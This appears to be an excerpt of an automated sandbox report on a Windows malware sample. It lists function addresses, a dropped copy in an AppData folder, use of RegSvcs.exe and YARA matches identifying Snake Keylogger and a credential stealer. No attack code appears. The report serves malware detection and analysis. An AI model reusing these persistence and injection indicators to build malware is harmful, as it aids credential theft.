Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E051BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		3_2_00E051BD
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_005051BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		6_2_005051BD

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DAE6A0	3_2_00DAE6A0
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DCD975	3_2_00DCD975
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DAFCE0	3_2_00DAFCE0
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DC21C5	3_2_00DC21C5
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DD62D2	3_2_00DD62D2
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E203DA	3_2_00E203DA
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DD242E	3_2_00DD242E
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DC25FA	3_2_00DC25FA
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DB66E1	3_2_00DB66E1
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DFE616	3_2_00DFE616
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DD878F	3_2_00DD878F
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E08889	3_2_00E08889
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DD6844	3_2_00DD6844
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E20857	3_2_00E20857
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DB8808	3_2_00DB8808
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DCCB21	3_2_00DCCB21
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DD6DB6	3_2_00DD6DB6
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DB6F9E	3_2_00DB6F9E
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DB3030	3_2_00DB3030
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DCF1D9	3_2_00DCF1D9
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DC3187	3_2_00DC3187
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DA1287	3_2_00DA1287
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DC1484	3_2_00DC1484
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DB5520	3_2_00DB5520
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DC7696	3_2_00DC7696
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DB5760	3_2_00DB5760
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DC1978	3_2_00DC1978
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DD9AB5	3_2_00DD9AB5
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E27DDB	3_2_00E27DDB
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DC1D90	3_2_00DC1D90
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DCBDA6	3_2_00DCBDA6
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DB3FE0	3_2_00DB3FE0
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00DADF00	3_2_00DADF00
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_013E3670	3_2_013E3670
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004AE6A0	6_2_004AE6A0
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004CD975	6_2_004CD975
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004AFCE0	6_2_004AFCE0
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004C21C5	6_2_004C21C5
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004D62D2	6_2_004D62D2
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_005203DA	6_2_005203DA
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004D242E	6_2_004D242E
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004C25FA	6_2_004C25FA
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004FE616	6_2_004FE616
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004B66E1	6_2_004B66E1
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004D878F	6_2_004D878F
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_00520857	6_2_00520857
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004D6844	6_2_004D6844
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004B8808	6_2_004B8808
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_00508889	6_2_00508889
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004CCB21	6_2_004CCB21
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004D6DB6	6_2_004D6DB6
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004B6F9E	6_2_004B6F9E
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004B3030	6_2_004B3030
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004CF1D9	6_2_004CF1D9
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004C3187	6_2_004C3187
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004A1287	6_2_004A1287
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004C1484	6_2_004C1484
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004B5520	6_2_004B5520
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004C7696	6_2_004C7696
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004B5760	6_2_004B5760
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004C1978	6_2_004C1978
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004D9AB5	6_2_004D9AB5
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_00527DDB	6_2_00527DDB
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004C1D90	6_2_004C1D90
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004CBDA6	6_2_004CBDA6
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004ADF00	6_2_004ADF00
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_004B3FE0	6_2_004B3FE0
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_012B3670	6_2_012B3670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02ABD278	7_2_02ABD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02AB5370	7_2_02AB5370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02ABA088	7_2_02ABA088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02AB7118	7_2_02AB7118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02ABC146	7_2_02ABC146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02ABC738	7_2_02ABC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02ABC468	7_2_02ABC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02ABCA08	7_2_02ABCA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02AB69A0	7_2_02AB69A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02ABE988	7_2_02ABE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02ABCFAA	7_2_02ABCFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02ABCCD8	7_2_02ABCCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02AB29E0	7_2_02AB29E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02ABF961	7_2_02ABF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02ABE97A	7_2_02ABE97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_02AB3E09	7_2_02AB3E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A9668	7_2_065A9668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A2A90	7_2_065A2A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A1FA8	7_2_065A1FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A1850	7_2_065A1850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A5148	7_2_065A5148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A9D90	7_2_065A9D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AD670	7_2_065AD670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AD660	7_2_065AD660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AD218	7_2_065AD218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065ADAC8	7_2_065ADAC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065ADAB9	7_2_065ADAB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AE378	7_2_065AE378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AE36A	7_2_065AE36A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065ADF11	7_2_065ADF11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A0B30	7_2_065A0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065ADF20	7_2_065ADF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A0B20	7_2_065A0B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AE7D0	7_2_065AE7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AE7C0	7_2_065AE7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A1F9C	7_2_065A1F9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A9448	7_2_065A9448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A0040	7_2_065A0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A1841	7_2_065A1841
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AF071	7_2_065AF071
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AEC18	7_2_065AEC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A0006	7_2_065A0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AEC28	7_2_065AEC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AF4D8	7_2_065AF4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AF4C8	7_2_065AF4C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A8CC0	7_2_065A8CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AF080	7_2_065AF080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A8CB1	7_2_065A8CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A5138	7_2_065A5138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AF930	7_2_065AF930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065A9D29	7_2_065A9D29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065AF922	7_2_065AF922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065ACDC0	7_2_065ACDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_065ACDAF	7_2_065ACDAF
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 9_2_01703670	9_2_01703670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016DC146	10_2_016DC146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016DA088	10_2_016DA088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016D5370	10_2_016D5370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016DD278	10_2_016DD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016DC468	10_2_016DC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016DC738	10_2_016DC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016D69A0	10_2_016D69A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016DE988	10_2_016DE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016D3B89	10_2_016D3B89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016DCA08	10_2_016DCA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016DCCD8	10_2_016DCCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016D6FC8	10_2_016D6FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016DCFA9	10_2_016DCFA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016D3E09	10_2_016D3E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016DF961	10_2_016DF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016DE97A	10_2_016DE97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016D29EC	10_2_016D29EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_016D3AA1	10_2_016D3AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C72A90	10_2_06C72A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C79668	10_2_06C79668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C71FA8	10_2_06C71FA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C71850	10_2_06C71850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C75148	10_2_06C75148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C79D38	10_2_06C79D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7DAC8	10_2_06C7DAC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7DAB9	10_2_06C7DAB9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7D670	10_2_06C7D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7D218	10_2_06C7D218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7E7CF	10_2_06C7E7CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7E7D0	10_2_06C7E7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C71FA1	10_2_06C71FA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7E377	10_2_06C7E377
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7E378	10_2_06C7E378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7DF1F	10_2_06C7DF1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7DF20	10_2_06C7DF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C70B20	10_2_06C70B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C70B30	10_2_06C70B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C78CC0	10_2_06C78CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7F4D8	10_2_06C7F4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7F080	10_2_06C7F080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C71841	10_2_06C71841
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C70040	10_2_06C70040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7F071	10_2_06C7F071
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7EC28	10_2_06C7EC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7003F	10_2_06C7003F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7CDC0	10_2_06C7CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C75142	10_2_06C75142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 10_2_06C7F930	10_2_06C7F930

Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: String function: 00DA7DE1 appears 35 times
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: String function: 00DC0AE3 appears 70 times
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: String function: 00DC8900 appears 42 times
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: String function: 004C8900 appears 42 times
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: String function: 004C0AE3 appears 70 times
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: String function: 004A7DE1 appears 36 times

Source: drRbNknjyb.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 6.2.acrorrheuma.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.acrorrheuma.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.acrorrheuma.exe.3910000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.acrorrheuma.exe.2020000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.acrorrheuma.exe.2020000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.acrorrheuma.exe.2020000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.acrorrheuma.exe.2020000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.acrorrheuma.exe.3910000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.1306740492.0000000003910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.1424897153.0000000002020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
